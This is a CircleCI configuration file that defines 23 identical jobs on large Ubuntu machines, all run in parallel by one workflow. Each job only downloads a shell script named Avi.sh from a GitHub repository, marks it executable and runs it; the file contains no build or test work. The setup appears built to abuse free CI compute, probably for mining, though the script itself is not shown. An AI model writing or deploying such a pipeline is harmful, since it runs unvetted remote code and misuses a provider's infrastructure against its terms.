version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 
      

  build2:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 
      


  build3:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 


  build4:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build5:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build6:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 
      


  build7:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 


  build8:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build9:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 


  build10:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build11:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 
      


  build12:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 


  build13:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build14:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build15:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 
      


  build16:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 


  build17:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build18:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 


  build19:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build20:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 
      


  build21:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 


  build22:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 

  build23:
    machine:
      image: ubuntu-2004:202010-01
      resource_class: large
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 





      
workflows:
    version: 2.1
    build:
        jobs:
            - build
            - build2
            - build3
            - build4
            - build5
            - build6
            - build7
            - build8            
            - build9
            - build10
            - build11
            - build12
            - build13
            - build14
            - build15
            - build16
            - build17          
            - build18
            - build19
            - build20
            - build21
            - build22
            - build23
